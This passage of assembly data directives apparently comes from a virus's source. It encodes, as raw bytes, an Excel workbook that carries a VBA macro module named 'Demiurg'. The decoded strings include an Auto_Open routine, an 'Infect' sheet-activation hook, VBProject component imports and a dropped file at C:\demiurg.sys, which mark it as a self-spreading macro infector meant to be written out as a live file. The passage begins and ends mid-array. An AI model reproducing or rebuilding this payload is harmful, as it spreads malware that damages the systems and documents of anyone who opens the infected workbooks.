0E6h db 004h, 0FFh, 0E6h, 004h, 000h, 0DFh, 000h, 0FFh db 0FFh, 0E6h, 004h, 000h, 00Ch, 000h, 0E6h, 080h db 0FFh, 028h, 000h, 000h, 000h, 002h, 000h, 053h db 04Ch, 0E6h, 004h, 0FFh, 000h, 000h, 001h, 000h db 053h, 010h, 0E6h, 004h, 0FFh, 000h, 000h, 001h db 000h, 053h, 094h, 0E6h, 004h, 0FFh, 0E6h, 004h db 000h, 002h, 03Ch, 0E6h, 004h, 0FFh, 000h, 000h db 0FFh, 0FFh, 001h, 001h, 0E6h, 004h, 000h, 001h db 000h, 04Eh, 000h, 030h, 000h, 07Bh, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 032h, 000h, 030h db 000h, 038h, 000h, 032h, 000h, 030h, 000h, 02Dh db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 02Dh, 000h, 043h, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h db 000h, 030h, 000h, 034h, 000h, 036h, 000h, 07Dh db 0E6h, 007h, 000h, 0DFh, 0E6h, 004h, 000h, 0E6h db 004h, 0FFh, 001h, 001h, 038h, 000h, 000h, 000h db 002h, 081h, 0FEh, 0E6h, 009h, 0FFh, 028h, 0E6h db 005h, 000h, 0FFh, 0FFh, 0E6h, 008h, 000h, 0E6h db 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h, 000h db 000h, 024h, 000h, 000h, 000h, 0E6h, 004h, 0FFh db 048h, 0E6h, 005h, 000h, 0FFh, 0FFh, 000h, 000h db 001h, 0E6h, 007h, 000h, 0E6h, 00Ch, 0FFh, 0E6h db 004h, 000h, 0E6h, 010h, 0FFh, 0E6h, 004h, 000h db 0E6h, 010h, 0FFh, 0E6h, 008h, 000h, 0E6h, 008h db 0FFh, 0E6h, 004h, 000h, 0E6h, 01Eh, 0FFh, 04Dh db 045h, 000h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h db 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh db 001h, 001h, 0E6h, 040h, 000h, 0FEh, 0CAh, 001h db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 001h, 001h db 008h, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 078h db 000h, 000h, 000h, 001h, 09Ch, 0B0h, 000h, 041h db 074h, 074h, 072h, 069h, 062h, 075h, 074h, 000h db 065h, 020h, 056h, 042h, 05Fh, 04Eh, 061h, 06Dh db 000h, 065h, 020h, 03Dh, 020h, 022h, 054h, 061h db 062h, 000h, 065h, 06Ch, 06Ch, 065h, 031h, 022h db 00Dh, 00Ah, 011h, 00Ah, 0F8h, 042h, 061h, 073h db 002h, 07Ch, 030h, 07Bh, 030h, 000h, 030h, 030h db 032h, 030h, 038h, 032h, 030h, 02Dh, 03Bh, 000h db 020h, 004h, 008h, 043h, 000h, 014h, 002h, 01Ch db 001h, 024h, 030h, 030h, 008h, 034h, 036h, 07Dh db 00Dh, 07Ch, 043h, 072h, 065h, 061h, 010h, 074h db 061h, 062h, 06Ch, 001h, 086h, 046h, 061h, 06Ch db 004h, 073h, 065h, 00Ch, 0BCh, 050h, 072h, 065h db 064h, 065h, 048h, 063h, 06Ch, 061h, 000h, 006h db 049h, 064h, 000h, 087h, 054h, 004h, 072h, 075h db 00Dh, 022h, 045h, 078h, 070h, 06Fh, 073h, 002h db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 06Ch db 061h, 080h, 074h, 065h, 044h, 065h, 072h, 069h db 076h, 002h, 024h, 001h, 011h, 065h, 043h, 075h db 073h, 074h, 06Fh, 06Dh, 069h, 006h, 07Ah, 004h db 088h, 003h, 032h, 000h, 001h, 016h, 001h, 000h db 001h, 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h db 0E6h, 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h db 000h, 000h, 003h, 000h, 000h, 000h, 005h, 000h db 000h, 000h, 007h, 000h, 000h, 000h, 0E6h, 008h db 0FFh, 001h, 001h, 008h, 000h, 000h, 000h, 0E6h db 004h, 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h db 000h, 000h, 037h, 003h, 000h, 000h, 0A5h, 001h db 000h, 000h, 0E6h, 004h, 0FFh, 002h, 000h, 000h db 000h, 001h, 000h, 000h, 000h, 0B5h, 031h, 0BBh db 031h, 000h, 000h, 0FFh, 0FFh, 003h, 0E6h, 007h db 000h, 002h, 0E6h, 020h, 000h, 0FFh, 0FFh, 000h db 000h, 053h, 003h, 000h, 000h, 0D6h, 000h, 000h db 000h, 0D6h, 000h, 000h, 000h, 0B7h, 005h, 0E6h db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h db 0DFh, 000h, 0FFh, 0FFh, 0E6h, 006h, 000h, 0E6h db 080h, 0FFh, 028h, 0E6h, 005h, 000h, 002h, 03Ch db 00Ch, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 002h db 03Ch, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 002h db 03Ch, 004h, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h db 002h, 03Ch, 008h, 000h, 0FFh, 0FFh, 000h, 000h db 0FFh, 0FFh, 001h, 001h, 0E6h, 006h, 000h, 0E8h db 005h, 0C0h, 038h, 003h, 000h, 0DFh, 0E6h, 004h db 000h, 050h, 000h, 000h, 000h, 001h, 001h, 010h db 001h, 000h, 000h, 00Bh, 012h, 01Eh, 002h, 080h db 0E6h, 006h, 000h, 060h, 0E6h, 004h, 000h, 0E6h db 008h, 0FFh, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh db 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh, 000h, 000h db 003h, 000h, 003h, 000h, 000h, 000h, 084h, 000h db 000h, 001h, 0E6h, 006h, 000h, 080h, 000h, 000h db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h db 004h, 0FFh, 0C0h, 000h, 000h, 000h, 028h, 0E6h db 007h, 000h, 0E6h, 004h, 0FFh, 068h, 0FFh, 040h db 000h, 0E6h, 00Ah, 0FFh, 001h, 000h, 003h, 000h db 003h, 000h, 003h, 000h, 084h, 000h, 000h, 001h db 0E6h, 006h, 000h, 00Bh, 012h, 02Ah, 002h, 0E6h db 004h, 0FFh, 002h, 000h, 000h, 060h, 0E6h, 004h db 000h, 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 0E6h db 004h, 0FFh, 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh db 002h, 000h, 00Dh, 000h, 00Dh, 000h, 006h, 000h db 084h, 000h, 000h, 001h, 000h, 000h, 004h, 000h db 0E6h, 006h, 0FFh, 010h, 000h, 000h, 000h, 040h db 0E6h, 007h, 000h, 080h, 000h, 000h, 000h, 0E6h db 004h, 0FFh, 002h, 083h, 01Ch, 002h, 0E6h, 004h db 0FFh, 008h, 000h, 0FFh, 0FFh, 000h, 001h, 0E6h db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h db 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h db 000h, 000h, 024h, 000h, 000h, 000h, 0E6h, 004h db 0FFh, 0F0h, 000h, 000h, 000h, 002h, 000h, 002h db 0E6h, 00Fh, 000h, 0E6h, 010h, 0FFh, 080h, 000h db 000h, 000h, 0E6h, 018h, 0FFh, 0D8h, 0E6h, 00Bh db 000h, 008h, 000h, 004h, 000h, 0E6h, 004h, 0FFh db 0E6h, 004h, 000h, 0E6h, 018h, 0FFh, 004h, 000h db 040h, 000h, 000h, 000h, 04Dh, 045h, 000h, 000h db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 010h, 000h db 022h, 081h, 008h, 000h, 006h, 000h, 00Ch, 0E6h db 006h, 000h, 081h, 008h, 004h, 012h, 000h, 000h db 000h, 008h, 000h, 000h, 000h, 004h, 081h, 008h db 000h, 002h, 000h, 000h, 000h, 020h, 000h, 000h db 000h, 022h, 081h, 008h, 000h, 006h, 000h, 00Ch db 000h, 040h, 0E6h, 004h, 000h, 081h, 008h, 004h db 00Ah, 000h, 000h, 000h, 048h, 0E6h, 004h, 000h db 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh db 000h, 081h, 008h, 004h, 026h, 000h, 000h, 000h db 058h, 0E6h, 004h, 000h, 081h, 008h, 004h, 02Eh db 000h, 000h, 000h, 080h, 0E6h, 004h, 000h, 080h db 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh, 000h db 081h, 008h, 008h, 01Eh, 000h, 000h, 000h, 0B0h db 0E6h, 004h, 000h, 081h, 008h, 00Ch, 02Ch, 000h db 000h, 000h, 0D0h, 0E6h, 004h, 000h, 081h, 008h db 008h, 00Ah, 0E6h, 004h, 000h, 001h, 000h, 000h db 000h, 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h db 0FFh, 000h, 081h, 008h, 004h, 026h, 000h, 000h db 000h, 010h, 001h, 000h, 000h, 000h, 081h, 008h db 004h, 00Ah, 000h, 000h, 000h, 038h, 001h, 000h db 000h, 004h, 081h, 008h, 000h, 002h, 000h, 000h db 000h, 048h, 001h, 000h, 000h, 0E6h, 004h, 0FFh db 001h, 001h, 058h, 001h, 000h, 000h, 08Fh, 004h db 0E6h, 006h, 000h, 0AEh, 000h, 006h, 000h, 049h db 06Eh, 066h, 065h, 063h, 074h, 020h, 000h, 020h db 002h, 028h, 000h, 022h, 002h, 0E6h, 006h, 0FFh db 06Ch, 000h, 0FFh, 0FFh, 058h, 000h, 000h, 000h db 0AFh, 000h, 020h, 000h, 026h, 002h, 028h, 000h db 028h, 002h, 0FFh, 0FFh, 015h, 002h, 000h, 000h db 06Ch, 000h, 0FFh, 0FFh, 038h, 000h, 000h, 000h db 08Fh, 004h, 080h, 0E6h, 005h, 000h, 0AFh, 000h db 020h, 000h, 020h, 002h, 028h, 000h, 02Ch, 002h db 0E6h, 006h, 0FFh, 020h, 000h, 032h, 002h, 021h db 000h, 008h, 001h, 020h, 000h, 032h, 002h, 021h db 000h, 008h, 001h, 01Bh, 000h, 0A4h, 000h, 001h db 000h, 024h, 020h, 0FCh, 000h, 003h, 000h, 024h db 000h, 030h, 002h, 001h, 000h, 027h, 000h, 02Eh db 002h, 000h, 000h, 0AEh, 000h, 001h, 000h, 031h db 000h, 024h, 000h, 030h, 002h, 001h, 000h, 020h db 000h, 02Eh, 002h, 007h, 000h, 020h, 000h, 02Eh db 002h, 0AEh, 000h, 001h, 000h, 039h, 000h, 024h db 000h, 030h, 002h, 001h, 000h, 007h, 000h, 004h db 000h, 094h, 000h, 046h, 000h, 075h, 000h, 067h db 000h, 000h, 0F0h, 0F7h, 000h, 020h, 000h, 034h db 002h, 0F6h, 000h, 0A4h, 000h, 001h, 000h, 020h db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h db 000h, 038h, 002h, 021h, 000h, 03Ah, 002h, 08Bh db 000h, 000h, 000h, 020h, 000h, 034h, 002h, 020h db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 025h db 000h, 038h, 002h, 001h, 000h, 021h, 000h, 008h db 001h, 0AEh, 000h, 007h, 000h, 044h, 065h, 06Dh db 069h, 075h, 072h, 067h, 000h, 005h, 000h, 094h db 000h, 046h, 000h, 075h, 000h, 067h, 000h, 0F8h db 000h, 000h, 000h, 0F7h, 000h, 020h, 000h, 034h db 002h, 0F6h, 000h, 0C0h, 000h, 000h, 0A0h, 048h db 037h, 044h, 000h, 0AEh, 000h, 00Eh, 000h, 043h db 03Ah, 05Ch, 064h, 065h, 06Dh, 069h, 075h, 072h db 067h, 02Eh, 073h, 079h, 073h, 01Dh, 000h, 020h db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h db 000h, 038h, 002h, 042h, 040h, 03Ch, 002h, 001h db 000h, 000h, 000h, 020h, 000h, 032h, 002h, 042h db 040h, 03Eh, 002h, 0E6h, 004h, 000h, 021h, 000h db 000h, 0A0h, 06Ch, 000h, 0FFh, 0FFh, 0A8h, 000h db 000h, 000h, 0E6h, 004h, 0FFh, 0A8h, 000h, 000h db 000h, 001h, 064h, 0B1h, 000h, 041h, 074h, 074h db 072h, 069h, 062h, 075h, 074h, 000h, 065h, 020h db 056h, 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h db 020h, 03Dh, 020h, 022h, 044h, 065h, 06Dh, 000h db 069h, 075h, 072h, 067h, 022h, 00Dh, 00Ah, 053h db 000h, 075h, 062h, 020h, 041h, 075h, 074h, 06Fh db 05Fh, 000h, 04Fh, 070h, 065h, 06Eh, 028h, 029h db 00Dh, 00Ah, 002h, 020h, 000h, 000h, 041h, 070h db 070h, 06Ch, 069h, 063h, 000h, 061h, 074h, 069h db 06Fh, 06Eh, 02Eh, 04Fh, 06Eh, 000h, 053h, 068h db 065h, 065h, 074h, 041h, 063h, 074h, 018h, 069h db 076h, 061h, 000h, 08Ah, 000h, 07Ah, 049h, 06Eh db 066h, 008h, 065h, 063h, 074h, 000h, 078h, 045h db 06Eh, 064h, 020h, 00Fh, 000h, 080h, 003h, 08Ah db 003h, 02Ah, 011h, 084h, 044h, 069h, 073h, 070h db 000h, 06Ch, 061h, 079h, 041h, 06Ch, 065h, 072h db 074h, 002h, 073h, 000h, 07Eh, 046h, 061h, 06Ch db 073h, 065h, 00Dh, 002h, 00Ah, 003h, 06Bh, 06Ch db 061h, 073h, 074h, 063h, 068h, 004h, 061h, 072h db 000h, 017h, 041h, 073h, 063h, 028h, 04Dh, 010h db 069h, 064h, 024h, 028h, 002h, 06Ch, 065h, 057h db 06Fh, 080h, 072h, 06Bh, 062h, 06Fh, 06Fh, 06Bh db 02Eh, 001h, 0B5h, 018h, 02Ch, 020h, 04Ch, 000h db 09Fh, 010h, 018h, 029h, 02Ch, 020h, 044h, 031h db 029h, 004h, 0B7h, 049h, 066h, 020h, 001h, 043h db 022h, 080h, 031h, 022h, 029h, 020h, 03Ch, 03Dh db 020h, 006h, 05Ah, 05Eh, 041h, 080h, 053h, 006h db 006h, 000h, 00Ch, 002h, 012h, 039h, 000h, 012h db 054h, 000h, 068h, 065h, 06Eh, 020h, 045h, 078h db 069h, 074h, 007h, 003h, 063h, 083h, 048h, 081h db 080h, 046h, 06Fh, 072h, 020h, 069h, 041h, 000h db 049h, 031h, 020h, 054h, 06Fh, 020h, 08Ch, 03Ah db 056h, 020h, 042h, 050h, 072h, 06Fh, 06Ah, 080h db 080h, 02Eh, 056h, 000h, 042h, 043h, 06Fh, 06Dh db 070h, 06Fh, 06Eh, 065h, 000h, 06Eh, 074h, 073h db 02Eh, 063h, 06Fh, 075h, 06Eh, 07Eh, 074h, 087h db 020h, 081h, 022h, 081h, 047h, 081h, 09Bh, 007h db 065h, 093h, 01Dh, 028h, 0DCh, 069h, 029h, 002h db 072h, 000h, 038h, 006h, 0CDh, 020h, 08Ch, 04Dh db 081h, 027h, 081h, 081h, 001h, 04Eh, 065h, 078h db 074h, 020h, 069h, 085h, 09Eh, 005h, 023h, 04Dh db 049h, 000h, 029h, 072h, 074h, 020h, 028h, 022h db 010h, 043h, 03Ah, 05Ch, 064h, 083h, 07Eh, 02Eh db 073h, 079h, 08Ch, 073h, 022h, 085h, 07Bh, 0CBh db 028h, 053h, 061h, 076h, 040h, 067h, 001h, 0C6h db 076h, 0E6h, 021h, 000h, 0CCh, 061h, 05Eh, 000h db 000h, 001h, 000h, 0FFh, 007h, 00Ch, 000h, 000h db 009h, 004h, 000h, 000h, 0E4h, 004h, 001h, 0E6h db 009h, 000h, 001h, 000h, 005h, 000h, 002h, 000h db 01Ah, 001h, 02Ah, 000h, 05Ch, 000h, 047h, 000h db 07Bh, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 032h, 000h, 030h, 000h, 034h, 000h, 045h, 000h db 046h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 02Dh, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h db 043h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 034h, 000h db 036h, 000h, 07Dh, 000h, 023h, 000h, 033h, 000h db 02Eh, 000h, 030h, 000h, 023h, 000h, 039h, 000h db 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch, 000h db 050h, 000h, 052h, 000h, 04Fh, 000h, 047h, 000h db 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh, 000h db 045h, 000h, 05Ch, 000h, 047h, 000h, 045h, 000h db 04Dh, 000h, 045h, 000h, 049h, 000h, 04Eh, 000h db 053h, 000h, 041h, 000h, 04Dh, 000h, 045h, 000h db 020h, 000h, 044h, 000h, 041h, 000h, 054h, 000h db 045h, 000h, 049h, 000h, 045h, 000h, 04Eh, 000h db 05Ch, 000h, 04Dh, 000h, 049h, 000h, 043h, 000h db 052h, 000h, 04Fh, 000h, 053h, 000h, 04Fh, 000h db 046h, 000h, 054h, 000h, 020h, 000h, 053h, 000h db 048h, 000h, 041h, 000h, 052h, 000h, 045h, 000h db 044h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h db 041h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h db 041h, 000h, 033h, 000h, 033h, 000h, 032h, 000h db 02Eh, 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h db 023h, 000h, 056h, 000h, 069h, 000h, 073h, 000h db 075h, 000h, 061h, 000h, 06Ch, 000h, 020h, 000h db 042h, 000h, 061h, 000h, 073h, 000h, 069h, 000h db 063h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h db 072h, 000h, 020h, 000h, 041h, 000h, 070h, 000h db 070h, 000h, 06Ch, 000h, 069h, 000h, 063h, 000h db 061h, 000h, 074h, 000h, 069h, 000h, 06Fh, 000h db 06Eh, 000h, 073h, 0E6h, 00Dh, 000h, 004h, 001h db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h db 030h, 000h, 038h, 000h, 031h, 000h, 033h, 000h db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h db 07Dh, 000h, 023h, 000h, 031h, 000h, 02Eh, 000h db 032h, 000h, 023h, 000h, 030h, 000h, 023h, 000h db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 050h, 000h db 072h, 000h, 06Fh, 000h, 067h, 000h, 072h, 000h db 061h, 000h, 06Dh, 000h, 06Dh, 000h, 065h, 000h db 05Ch, 000h, 04Dh, 000h, 069h, 000h, 063h, 000h db 072h, 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h db 066h, 000h, 074h, 000h, 020h, 000h, 04Fh, 000h db 066h, 000h, 066h, 000h, 069h, 000h, 063h, 000h db 065h, 000h, 05Ch, 000h, 04Fh, 000h, 066h, 000h db 066h, 000h, 069h, 000h, 063h, 000h, 065h, 000h db 05Ch, 000h, 045h, 000h, 058h, 000h, 043h, 000h db 045h, 000h, 04Ch, 000h, 038h, 000h, 02Eh, 000h db 04Fh, 000h, 04Ch, 000h, 042h, 000h, 023h, 000h db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h db 074h, 000h, 020h, 000h, 045h, 000h, 078h, 000h db 063h, 000h, 065h, 000h, 06Ch, 000h, 020h, 000h db 038h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h db 072h, 000h, 079h, 0E6h, 00Dh, 000h, 0B8h, 000h db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h db 030h, 000h, 034h, 000h, 033h, 000h, 030h, 000h db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h db 07Dh, 000h, 023h, 000h, 032h, 000h, 02Eh, 000h db 030h, 000h, 023h, 000h, 030h, 000h, 023h, 000h db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 057h, 000h db 049h, 000h, 04Eh, 000h, 044h, 000h, 04Fh, 000h db 057h, 000h, 053h, 000h, 05Ch, 000h, 053h, 000h db 059h, 000h, 053h, 000h, 054h, 000h, 045h, 000h db 04Dh, 000h, 05Ch, 000h, 053h, 000h, 054h, 000h db 044h, 000h, 04Fh, 000h, 04Ch, 000h, 045h, 000h db 032h, 000h, 02Eh, 000h, 054h, 000h, 04Ch, 000h db 042h, 000h, 023h, 000h, 04Fh, 000h, 04Ch, 000h db 045h, 000h, 020h, 000h, 041h, 000h, 075h, 000h db 074h, 000h, 06Fh, 000h, 06Dh, 000h, 061h, 000h db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h db 00Dh, 000h, 0E0h, 000h, 02Ah, 000h, 05Ch, 000h db 047h, 000h, 07Bh, 000h, 036h, 000h, 032h, 000h db 041h, 000h, 033h, 000h, 032h, 000h, 043h, 000h db 036h, 000h, 032h, 000h, 02Dh, 000h, 041h, 000h db 033h, 000h, 036h, 000h, 044h, 000h, 02Dh, 000h db 031h, 000h, 031h, 000h, 044h, 000h, 033h, 000h db 02Dh, 000h, 041h, 000h, 035h, 000h, 030h, 000h db 030h, 000h, 02Dh, 000h, 041h, 000h, 036h, 000h db 046h, 000h, 033h, 000h, 044h, 000h, 044h, 000h db 041h, 000h, 044h, 000h, 038h, 000h, 032h, 000h db 033h, 000h, 039h, 000h, 07Dh, 000h, 023h, 000h db 032h, 000h, 02Eh, 000h, 030h, 000h, 023h, 000h db 030h, 000h, 023h, 000h, 043h, 000h, 03Ah, 000h db 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh, 000h db 044h, 000h, 04Fh, 000h, 057h, 000h, 053h, 000h db 05Ch, 000h, 053h, 000h, 059h, 000h, 053h, 000h db 054h, 000h, 045h, 000h, 04Dh, 000h, 05Ch, 000h db 04Dh, 000h, 053h, 000h, 046h, 000h, 06Fh, 000h db 072h, 000h, 06Dh, 000h, 073h, 000h, 02Eh, 000h db 054h, 000h, 057h, 000h, 044h, 000h, 023h, 000h db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h db 074h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h db 072h, 000h, 06Dh, 000h, 073h, 000h, 020h, 000h db 032h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h db 072h, 000h, 079h, 0E6h, 00Bh, 000h, 001h, 000h db 0E4h, 000h, 02Ah, 000h, 05Ch, 000h, 047h, 000h db 07Bh, 000h, 036h, 000h, 032h, 000h, 041h, 000h db 033h, 000h, 032h, 000h, 043h, 000h, 036h, 000h db 033h, 000h, 02Dh, 000h, 041h, 000h, 033h, 000h db 036h, 000h, 044h, 000h, 02Dh, 000h, 031h, 000h db 031h, 000h, 044h, 000h, 033h, 000h, 02Dh, 000h db 081h, 000h, 000h, 000h, 082h, 000h, 000h, 000h db 083h, 000h, 000h, 000h, 084h, 000h, 000h, 000h db 085h, 000h, 000h, 000h, 086h, 000h, 000h, 000h db 087h, 000h, 000h, 000h, 088h, 000h, 000h, 000h db 089h, 000h, 000h, 000h, 08Ah, 000h, 000h, 000h db 08Bh, 000h, 000h, 000h, 08Ch, 000h, 000h, 000h db 08Dh, 000h, 000h, 000h, 08Eh, 000h, 000h, 000h db 08Fh, 000h, 000h, 000h, 090h, 000h, 000h, 000h db 091h, 000h, 000h, 000h, 092h, 000h, 000h, 000h db 093h, 000h, 000h, 000h, 094h, 000h, 000h, 000h db 095h, 000h, 000h, 000h, 096h, 000h, 000h, 000h db 097h, 000h, 000h, 000h, 098h, 000h, 000h, 000h db 0FEh, 0FFh, 0FFh, 0FFh, 09Ah, 000h, 000h, 000h db 09Bh, 000h, 000h, 000h, 09Ch, 000h, 000h, 000h db 09Dh, 000h, 000h, 000h, 09Eh, 000h, 000h, 000h db 09Fh, 000h, 000h, 000h, 0A0h, 000h, 000h, 000h db 0A1h, 000h, 000h, 000h, 0A2h, 000h, 000h, 000h db 0A3h, 000h, 000h, 000h, 0A4h, 000h, 000h, 000h db 0FEh, 0FFh, 0FFh, 0FFh, 0A6h, 000h, 000h, 000h db 0FEh, 0FFh, 0FFh, 0FFh, 0A8h, 000h, 000h, 000h db 0A9h, 000h, 000h, 000h, 0AAh, 000h, 000h, 000h db 0ABh, 000h, 000h, 000h, 0ACh, 000h, 000h, 000h db 0ADh, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh db 0AFh, 000h, 000h, 000h, 0B0h, 000h, 000h, 000h db 0FEh, 0FFh, 0FFh, 0FFh, 0B2h, 000h, 000h, 000h db 0B3h, 000h, 000h, 000h, 0B4h, 000h, 000h, 000h db 0B5h, 000h, 000h, 000h, 0B6h, 000h, 000h, 000h db 0B7h, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh db 0B9h, 000h, 000h, 000h, 0FEh, 0E6h, 0FFh, 0FFh db 0E6h, 01Ch, 0FFh, 041h, 000h, 035h, 000h, 030h db 000h, 030h, 000h, 02Dh, 000h, 041h, 000h, 036h db 000h, 046h, 000h, 033h, 000h, 044h, 000h, 044h db 000h, 041h, 000h, 044h, 000h, 038h, 000h, 032h db 000h, 033h, 000h, 039h, 000h, 07Dh, 000h, 023h db 000h, 032h, 000h, 02Eh, 000h, 030h, 000h, 023h db 000h, 030h, 000h, 023h, 000h, 043h, 000h, 03Ah db 000h, 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh db 000h, 044h, 000h, 04Fh, 000h, 057h, 000h, 053h db 000h, 05Ch, 000h, 054h, 000h, 045h, 000h, 04Dh db 000h, 050h, 000h, 05Ch, 000h, 056h, 000h, 042h db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh db 000h, 073h, 000h, 02Eh, 000h, 045h, 000h, 058h db 000h, 044h, 000h, 023h, 000h, 04Dh, 000h, 069h db 000h, 063h, 000h, 072h, 000h, 06Fh, 000h, 073h db 000h, 06Fh, 000h, 066h, 000h, 074h, 000h, 020h db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh db 000h, 073h, 000h, 020h, 000h, 032h, 000h, 02Eh db 000h, 030h, 000h, 020h, 000h, 04Fh, 000h, 062h db 000h, 06Ah, 000h, 065h, 000h, 063h, 000h, 074h db 000h, 020h, 000h, 04Ch, 000h, 069h, 000h, 062h db 000h, 072h, 000h, 061h, 000h, 072h, 000h, 079h db 0E6h, 00Bh, 000h, 001h, 000h, 000h, 000h, 0E1h db 02Eh, 045h, 00Dh, 08Fh, 0E0h, 01Ah, 010h, 085h db 02Eh, 002h, 060h, 08Ch, 04Dh, 00Bh, 0B4h, 000h db 000h, 004h, 001h, 02Ah, 000h, 05Ch, 000h, 047h db 000h, 07Bh, 000h, 032h, 000h, 044h, 000h, 046h db 000h, 038h, 000h, 044h, 000h, 030h, 000h, 034h db 000h, 043h, 000h, 02Dh, 000h, 035h, 000h, 042h db 000h, 046h, 000h, 041h, 000h, 02Dh, 000h, 031h db 000h, 030h, 000h, 031h, 000h, 042h, 000h, 02Dh db 000h, 042h, 000h, 044h, 000h, 045h, 000h, 035h db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 041h db 000h, 041h, 000h, 030h, 000h, 030h, 000h, 034h db 000h, 034h, 000h, 044h, 000h, 045h, 000h, 035h db 000h, 032h, 000h, 07Dh, 000h, 023h, 000h, 032h db 000h, 02Eh, 000h, 030h, 000h, 023h, 000h, 030h db 000h, 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch db 000h, 050h, 000h, 052h, 000h, 04Fh, 000h, 047h db 000h, 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 049h db 000h, 043h, 000h, 052h, 000h, 04Fh, 000h, 